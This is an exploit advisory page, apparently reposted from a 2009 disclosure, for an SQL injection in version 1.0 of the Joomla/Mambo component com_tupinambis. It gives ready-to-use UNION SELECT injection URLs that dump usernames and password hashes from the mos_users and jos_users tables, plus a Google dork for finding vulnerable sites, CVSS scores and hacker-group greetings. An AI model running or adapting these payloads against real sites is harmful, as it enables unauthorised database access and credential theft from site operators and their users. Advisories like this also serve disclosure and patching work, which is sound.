Mambo/Joomla com_tupinambis 1.0 SQL Injection

2009.09.29
Credit: Don Tukulesto
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

####################################################### ## Mambo/Joomla SQL Injection Vulneralbility ## ## Component : com_tupinambis ## ## Release : September 23, 2009 ## ## --------------------------------------------------## ##.---..-..-..-.,-..-..-..-. .---..---..---..----. ## ##`| |'| || || . < | || || |__ | |- \ \ `| |'| || | ## ## `-' `----'`-'`-'`----'`----'`---'`---' `-' `----' ## ##-------------------------------------------------- ## ####################################################### [+] Author : Don Tukulesto [+] Homepage : http://www.indonesiancoder.com [+] Location : Republik Indonesia ####################################################### [ Software Information ] [+] Software : com_tupinambis [+] Version : 1.0 [+] Vendor : www.tupinambis.net [+] Download : http://www.onestopjoomla.com/extensions/auction/tupinambis/ [+] Vulnerability : SQL Injection [+] Google Dork : inurl:"com_tupinambis" ####################################################### [ ExPL0!T ] [+] Mambo : http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+mos_users-- [+] Joomla : http://127.0.0.1/index.php?option=com_tupinambis&task=verproyecto&proyecto=-666+union+select+1,2,3,concat_ws(0x3a,username,password)tukulesto,5,6,7,8,9,10,11+from+jos_users-- ####################################################### [ Greetings ] [+] All of Indonesian Coder Member, M3NW5, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut, Senot, Joker, Quick_5ilv3r, ran, m4ho666, Den Bayan, vyc0d, bh4nd55, Den Awink [+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com [+] ServerIsDown.org, Jack-, Yadoy666 + tante Miya, kecemplungkalen, xshadow, H4ck3rKu [+] Kill-9 Crew, kaMtiEz, Arianom, Pathloader, tiw0L, [+] V3n0m, Str0ke, sp3x, todd, Antisecurity.org, and YOU !!! [ SHOUT ] Happy Eidul Fitri 1430H. Minal Aidin Wal Faidzin. [ SP3C!AL ] lovely Emak, Bapak, Adek ku sayang (^_^)

References:

http://xforce.iss.net/xforce/xfdb/53454
http://www.vupen.com/english/advisories/2009/2730
http://www.securityfocus.com/bid/36511
http://secunia.com/advisories/36848
http://packetstormsecurity.org/0909-exploits/mambojoomlatupinambis-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top